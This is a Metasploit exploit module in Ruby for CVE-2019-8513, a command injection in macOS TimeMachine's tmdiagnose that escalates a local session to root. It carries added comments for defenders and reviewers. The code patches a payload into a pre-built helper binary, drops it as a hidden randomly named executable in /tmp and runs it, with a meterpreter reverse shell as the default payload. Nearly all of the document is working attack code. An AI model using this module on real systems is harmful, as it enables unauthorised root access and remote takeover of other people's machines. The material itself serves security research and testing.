Path: blob/master/modules/exploits/osx/local/timemachine_cmd_injection.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation module for CVE-2019-8513 (TimeMachine / tmdiagnose).
#
# The Ruby side does only staging: it reads a pre-built helper binary shipped
# with the framework (data/exploits/CVE-2019-8513/exploit), patches the chosen
# payload over a marker string inside it, drops the result as a hidden file in
# WritableDir and runs it through the existing (unprivileged) session. The
# crafted-volume-label step described in 'Description' is presumably carried out
# by that helper binary; it is not visible in this file.
#
# Defender notes (grounded in what this module does on the target):
#   - writes a hidden, randomly named executable into WritableDir (default /tmp)
#   - executes it from an existing session and prints its output
#   - registers the file with FileDropper so it is removed at cleanup
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata. 'WfsDelay' => 300 makes the handler wait up to 300 seconds
  # for a session, presumably because the payload is not run directly by this
  # module but later by the injected command. Target 0 (native x64) embeds the
  # encoded payload; the python and command targets embed a command string.
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',
      'Description'     => %q{
        This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in
        order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers
        from a command injection vulnerability that can be exploited by creating a
        specially crafted disk label.

        The tmdiagnose binary uses awk to list every mounted volume, and composes
        shell commands based on the volume labels. By creating a volume label with the
        backtick character, we can have our own binary executed with root priviledges.
      },
      'License'         => MSF_LICENSE,
      'Author'          => [
        'CodeColorist', # Discovery and exploit
        'timwr',        # Metasploit module
      ],
      'References'      => [
        ['CVE', '2019-8513'],
        ['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],
        ['URL', 'https://support.apple.com/en-in/HT209600'],
        ['URL', 'https://github.com/ChiChou/sploits'],
      ],
      'DefaultTarget'   => 0,
      'DefaultOptions'  => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
      'Targets'         => [
        [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
        [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
        [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
      ],
      'DisclosureDate'  => '2019-04-13'))
    # Directory on the target that must be writable by the current session;
    # the dropped helper binary is created (and later executed) there.
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Writes +filedata+ to +filepath+ on the target, marks it executable via the
  # Post::File chmod helper (default mode, not set here) and registers it with
  # FileDropper so it is deleted during module cleanup.
  def upload_executable_file(filepath, filedata)
    print_status("Uploading file: '#{filepath}'")
    write_file(filepath, filedata)
    chmod(filepath)
    register_file_for_cleanup(filepath)
  end

  # Version-only check. The reported system version is compared against
  # 10.14.4: that version or later is reported Safe, anything older Appears.
  # Nothing on the target (tmdiagnose itself, mounted volumes) is actually
  # probed, so the result says only that the OS version is in the affected
  # range given in 'Description'.
  def check
    version = Rex::Version.new(get_system_version)
    if version >= Rex::Version.new('10.14.4')
      CheckCode::Safe
    else
      CheckCode::Appears
    end
  end

  # Stages and runs the helper binary. Preconditions enforced before anything
  # touches the target: check must return Appears, the session must not already
  # be root, and WritableDir must be writable.
  def exploit
    if check != CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    # Pre-built helper shipped with the framework; read as binary so the
    # in-place patch below does not go through any encoding conversion.
    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit" ))
    # Native target: the encoded payload bytes are embedded as-is.
    # Other targets: a command string is embedded, tagged with a 'CMD:' prefix
    # (python payloads are first wrapped so they are piped into the interpreter).
    if target['Arch'] == ARCH_X64
      root_cmd = payload.encoded
    else
      root_cmd = payload.raw
      if target['Arch'] == ARCH_PYTHON
        root_cmd = "echo \"#{root_cmd}\" | python"
      end
      root_cmd = "CMD:#{root_cmd}"
    end
    # 1024 is the assumed size of the marker region inside the helper binary;
    # the binary itself is not inspected here — TODO confirm against the binary.
    if root_cmd.length > 1024
      fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
    end

    # In-place patch: String#[]= with a length overwrites exactly
    # root_cmd.length bytes starting at the marker, so the file size is
    # unchanged. NOTE(review): String#index returns nil when the marker is
    # absent, which would surface as a TypeError here rather than a fail_with.
    placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
    exploit_data[placeholder_index, root_cmd.length] = root_cmd

    # Hidden (dot-prefixed), randomly named file under WritableDir. From a
    # detection standpoint this is the main host artifact: a new hidden
    # executable in /tmp (default) that is executed moments after creation.
    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
    upload_executable_file(exploit_file, exploit_data)

    # Runs the helper from the unprivileged session and echoes its output;
    # the session for the embedded payload (if any) is handled by the
    # framework's handler, bounded by WfsDelay.
    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec(exploit_file)
    print_status("Exploit result:\n#{result}")
  end
end